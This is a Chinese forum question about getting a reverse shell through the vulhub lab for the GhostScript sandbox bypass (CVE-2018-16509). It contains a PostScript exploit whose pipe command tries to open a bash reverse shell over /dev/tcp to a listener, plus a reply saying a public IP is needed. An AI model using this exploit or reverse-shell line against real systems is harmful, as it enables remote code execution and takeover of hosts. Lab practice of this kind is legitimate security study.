下面的代码改成反弹shell执行失败,怎么改?

我想要达到的结果

vulhub里面漏洞——GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
反弹不了,应该怎么改啊

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%exec("/bin/bash -i >& /dev/tcp/192.168.52.0/8888") > /tmp/nxx && cat /tmp/nxx) currentdevice putdeviceprops

vulhub里面漏洞?
你需要你个公网ip去做反弹,不然靶机找不到192.168.52.0 (内网)

太高端了,不会,我就顶你一下好了,大佬加油